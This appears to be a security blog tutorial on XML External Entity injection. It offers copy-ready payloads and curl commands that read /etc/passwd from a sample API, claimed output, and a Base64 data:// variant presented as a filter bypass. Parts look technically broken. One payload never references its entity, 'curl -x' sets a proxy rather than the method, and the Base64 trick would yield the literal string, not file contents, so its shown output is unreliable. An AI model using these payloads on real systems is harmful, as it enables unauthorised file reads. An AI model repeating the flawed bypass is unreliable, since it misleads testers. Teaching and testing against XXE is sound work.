XXE Base64

XML External Entity (XXE) Injection exploits flaws found in the XML parser of a program which accepts an XML Document in some form or another. A complete guide on the topic is available [here], however I’ve had a lot of interest specifically in Base64 xxe exploitation, and so here we’ll dive deep on how we can leverage this attack vector.

TLDR; Test Payloads

You can use the following payload to test if an API or application is vulnerable to this attack

<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]>
<apiRequest></apiRequest>

Attack Surface

In general, the available attack vectors for an XXE vulnerability are as follows:
- File Inclusion
- Server Side Request Forgery (SSRF)
- XInclude
- File Upload (XML, SVG, DOCX, …)
- Content-Type Manipulation

In the case of Base64 XXE, we’re specifically looking to mask a file inclusion payload by using a base64 encoded string. This has the benefit of circumventing any primitive filtering of payloads that may block special characters or specific strings.

Let’s say there’s an API accepting an XML payload to generate a fish… We can create a payload, and use curl to post it.

<fish>
    <species>Salmon</species>
</fish>

curl -x POST -d '<fish><species>Salmon</species></fish>' salmonsec.com/XXEVulnerableAPI

Salmon created!

Now let’s suppose there are missing protection measures, and we can preform XXE Injection straight-up like this:

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<fish></fish>

curl -x POST -d '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><fish></fish>' salmonsec.com/XXEVulnerableAPI

Invalid species: root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  bin:x:2:2:bin:/bin:/usr/sbin/nologin

Just like that, we gained arbitrary file read on the system - fun! Let’s assume the developers of this application are active and attempt to remediate the issue by filtering for the file:// keyword…

Well, now we can just encode our payload as Base64!

echo 'file:///etc/passwd' | base64
ZmlsZTovLy9ldGMvcGFzc3dk

<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]>
<fish></fish>

curl -x POST -d '<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><fish></fish>' salmonsec.com/XXEVulnerableAPI

Invalid species: root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  bin:x:2:2:bin:/bin:/usr/sbin/nologin

Summary

You can replace any quoted string in an XML payload with Base64 by using this method, so keep it in mind when you’re testing for these vectors!

Directory

$ cd content && tree

|____2022

| |____September

| | |____offline_wiki_sync

| |____February

| | |____perfect_opsec_anon_accounts

| | |____perfect_opsec_pgp

| | |____perfect_opsec_anon_payment

| | |____perfect_opsec_disk_encryption

| | |____perfect_opsec_hardware_spoofing

| | |____perfect_opsec_vpn_vps_and_tor

| | |____perfect_opsec_tor_browser

| | |____perfect_opsec_source_network

| | |____perfect_opsec_os_install

| | |____perfect_opsec_mitigate_author_profiling

| | |____perfect_opsec_hardware

| | |____perfect_opsec_clearnet_browser

| | |____perfect_opsec_basic_os_config

|____2021

| |____December

| | |____thm_revil_corp

| | |____thm_cybercrafted

| | |____thm_road

| | |____thm_squidgame

| | |____thm_carnage

| |____August

| | |____xxe_base64

| | |____vulnhub_chronos_1

| | |____tryhackme_picklerick

| | |____tryhackme_superspamr

| | |____tryhackme_overpass

| |____July

| | |____home_lab_5

| | |____home_lab_4

| | |____home_lab_3

| |____June

| | |____home_lab_2

| | |____proxmox_lvm_disk_resize

| |____May

| | |____home_lab_1

| |____April

| | |____home_lab_0

| |____March

| | |____tryhackme_the_great_escape

| | |____tryhackme_enterprize

| | |____tryhackme_attacktive_directory

| | |____tryhackme_blue

| | |____pinkys_palace_2

| | |____temple_of_doom_1

| |____February

| | |____lin_security_1

| | |____chill_hack

| | |____y0usef_1

| |____January

| | |____pwnlab_1

| | |____cve_2021_3156

| | |____build_log_7

| | |____skytower_1

| | |____mr_roboot_1

| | |____vulnix_1

| | |____brainpan_1

| | |____sick_os_1_2

| | |____vuln_os_2

| | |____stapler_1

|____2020

| |____December

| | |____build_log_6

| |____November

| | |____game_dev_log_4

| | |____game_dev_log_3

| | |____game_dev_log_2

| | |____build_log_5

| |____January

| | |____game_dev_log_1

| |____September

| | |____saas_app_2

| | |____saas_app_1

| | |____build_log_4

| | |____build_log_3

| |____August

| | |____build_log_2

| | |____build_log_1

| |____July

| | |____playbook

| | |____kioptrix_level_5

| | |____kioptrix_level_4

| | |____kioptrix_level_3

| | |____kioptrix_level_2

| | |____kioptrix_level_1

| | |____ringzer0team_sysadmin_linux_8

| | |____ringzer0team_sysadmin_linux_7

| | |____ringzer0team_sysadmin_linux_6

| | |____ringzer0team_sysadmin_linux_5

| | |____ringzer0team_sysadmin_linux_4

| | |____ringzer0team_sysadmin_linux_3

| | |____ringzer0team_sysadmin_linux_2

| | |____ringzer0team_sysadmin_linux_1

| | |____planning_phase_0

| | |____blog_creation

Contents

XXE Base64

TLDR; Test Payloads

Attack Surface

Summary

Directory

Like my content?